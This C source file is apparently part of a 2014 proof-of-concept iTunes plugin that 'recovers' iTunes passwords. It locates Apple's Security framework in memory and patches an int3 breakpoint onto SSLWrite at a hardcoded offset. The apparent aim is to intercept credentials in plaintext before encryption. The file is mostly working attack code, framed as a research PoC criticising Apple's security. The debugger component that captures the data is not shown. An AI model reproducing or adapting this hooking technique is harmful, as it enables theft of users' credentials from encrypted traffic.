/*
 *
 *    _____                .__           ________                               __      ________.__
 *   /  _  \ ______ ______ |  |   ____   \______ \   ____   ____   ______ _____/  |_   /  _____/|__|__  __ ____
 *  /  /_\  \\____ \\____ \|  | _/ __ \   |    |  \ /  _ \_/ __ \ /  ___//    \   __\ /   \  ___|  \  \/ // __ \
 * /    |    \  |_> >  |_> >  |_\  ___/   |    `   (  <_> )  ___/ \___ \|   |  \  |   \    \_\  \  |\   /\  ___/
 * \____|__  /   __/|   __/|____/\___  > /_______  /\____/ \___  >____  >___|  /__|    \______  /__| \_/  \___  >
 *         \/|__|   |__|             \/          \/            \/     \/     \/               \/              \/
 *    _____    ___________             __        _____ ___.                  __
 *   /  _  \   \_   _____/_ __   ____ |  | __   /  _  \\_ |__   ____  __ ___/  |_
 *  /  /_\  \   |    __)|  |  \_/ ___\|  |/ /  /  /_\  \| __ \ /  _ \|  |  \   __\
 * /    |    \  |     \ |  |  /\  \___|    <  /    |    \ \_\ (  <_> )  |  /|  |
 * \____|__  /  \___  / |____/  \___  >__|_ \ \____|__  /___  /\____/|____/ |__|
 *         \/       \/              \/     \/         \/    \/
 *   _________                          .__  __          ._.
 *  /   _____/ ____   ____  __ _________|__|/  |_ ___.__.| |
 *  \_____  \_/ __ \_/ ___\|  |  \_  __ \  \   __<   |  || |
 *  /        \  ___/\  \___|  |  /|  | \/  ||  |  \___  | \|
 * /_______  /\___  >\___  >____/ |__|  |__||__|  / ____| __
 *         \/     \/     \/                       \/      \/
 *
 * AppleDoesntGiveAFuckAboutSecurity - An iTunes plugin to "recover" iTunes passwords
 *
 * Copyright (c) fG!, 2014 - reverser@put.as - http://reverse.put.as
 * All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 * notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 * notice, this list of conditions and the following disclaimer in the
 * documentation and/or other materials provided with the distribution.
 * 3. The name of the author may not be used to endorse or promote products
 * derived from this software without specific prior written permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
 * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
 * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
 * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
 * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
 * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
 * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
 * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
 * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
 * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 *
 * hijeffrey.c
 *
 */

#include "hijeffrey.h"

#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <mach/mach.h>
#include <mach/mach_types.h>
#include <mach/mach_vm.h>
#include <errno.h>
#include <sys/types.h>
#include <mach-o/loader.h>
#include <mach-o/dyld.h>
#include <mach-o/getsect.h>

#include "debugger.h"

#define EXIT_ON_MACH_ERROR(msg, retval) \
if (kr != KERN_SUCCESS) { mach_error(msg ":" , kr); exit((retval)); }

#define DEBUG 1

extern mach_vm_address_t breakpoint_base_address;
extern int install_debugger(void);

// local functions
static void patchmemory(mach_vm_address_t address);
static void unpatchmemory(struct header_info *hi);
static int find_image(struct header_info *hi);
static void find_and_patch_addresses(struct header_info *hi);

#pragma mark The exported functions

void
say_hi_jeffrey(struct header_info *hi)
{
    install_debugger();
    /* locate Security Framework */
    if (find_image(hi))
    {
        return;
    }
    /* install the int3 breakpoint on SSLWrite entry */
    find_and_patch_addresses(hi);
}

/* here the original bytes should be restored when plugin is stopped from Plugins menu */
void
say_bye_jeffrey(struct header_info *hi)
{
//    unpatchmemory(hi);
//    hi->active = 0;
}

#pragma mark Internal helper functions

/*
 * memory patcher
 */
void
patchmemory(mach_vm_address_t address)
{
	kern_return_t kr = 0;
	mach_port_t myself = 0;
	// get a send right
	myself = mach_task_self();
	// change memory protection
	kr = mach_vm_protect(myself, address, (mach_vm_size_t)8, FALSE, VM_PROT_READ | VM_PROT_WRITE | VM_PROT_EXECUTE);
	EXIT_ON_MACH_ERROR("mach_vm_protect", kr);
	// the new byte to write
	uint8_t opcode = 0xCC;
	// number of bytes to write
	mach_vm_size_t len = 1;
	printf("Patching bytes...\n");
	// and write the new byte (strings will be modified to m5u and m5u8)
	kr = mach_vm_write(myself, address+1, (vm_offset_t)&opcode, len);
	EXIT_ON_MACH_ERROR("mach_vm_protect", kr);
    // restore original protections
	kr = mach_vm_protect(myself, address, (mach_vm_size_t)8, FALSE, VM_PROT_READ | VM_PROT_EXECUTE);
	EXIT_ON_MACH_ERROR("mach_vm_protect", kr);
}

/*
 * iterate over the patch_addresses array and restore original byte
 */
void
unpatchmemory(struct header_info *hi)
{
	kern_return_t kr = 0;
	mach_port_t myself = 0;
	// get a send right
	myself = mach_task_self();
    int index = 0;
    while (hi->patch_addresses[index] != 0)
    {
        printf("Patching %p\n", (void*)hi->patch_addresses[index]);
        // change memory protection
        kr = mach_vm_protect(myself, hi->patch_addresses[index], (mach_vm_size_t)8, FALSE, VM_PROT_READ | VM_PROT_WRITE | VM_PROT_EXECUTE);
        EXIT_ON_MACH_ERROR("mach_vm_protect", kr);
        // the new byte to write
        uint8_t opcode = 0x48;
        // number of bytes to write
        mach_vm_size_t len = 1;
        printf("Restoring original bytes...\n");
        // and write the new byte (strings will be modified to m3u and m3u8)
        kr = mach_vm_write(myself, hi->patch_addresses[index]+1, (vm_offset_t)&opcode, len);
        EXIT_ON_MACH_ERROR("mach_vm_protect", kr);
        // restore original protections
        kr = mach_vm_protect(myself, hi->patch_addresses[index], (mach_vm_size_t)8, FALSE, VM_PROT_READ | VM_PROT_EXECUTE);
        EXIT_ON_MACH_ERROR("mach_vm_protect", kr);
        index++;
    }
    memset(hi->patch_addresses, '\0', 16*sizeof(mach_vm_address_t));
}


/*
 * if this wasn't a lazy PoC, this function should process the symbols from
 * /System/Library/Frameworks/Security.framework/Versions/A/Security
 * and retrieve the address of SSLWrite.
 * But it's a lazy PoC so value is hardcoded to latest iTunes on Mavericks 10.9.1
 * The hardcoded value is just the offset since we found the base address of the library
 */
void
find_and_patch_addresses(struct header_info *hi)
{
    patchmemory((mach_vm_address_t)hi->mh+0x52D38);
}


/*
 * find the location of Security framework where SSLWrite is located
 * we just need to iterate thru loaded images and retrieve the necessary information
 * better approach would be to use a dyld observer and get notification
 * it works ok this way because plugins are loaded after iTunes.
 */
int
find_image(struct header_info *hi)
{
    uint32_t nr_images = _dyld_image_count();
    const struct mach_header *mh = NULL;
    intptr_t aslr_slide = 0;
    for (uint32_t i = 0; i < nr_images; i++)
    {
        const char *image_name = _dyld_get_image_name(i);
        if (strcmp("/System/Library/Frameworks/Security.framework/Versions/A/Security", image_name) == 0)
        {
            aslr_slide = _dyld_get_image_vmaddr_slide(i);
            mh = _dyld_get_image_header(i);
            hi->mh = (const struct mach_header_64*)mh;
            hi->aslr_slide = aslr_slide;
            printf("Found Security Framework image located at 0x%llx with ASLR %p\n", (mach_vm_address_t)hi->mh, (void*)hi->aslr_slide);
        }
    }
	return 0;
}
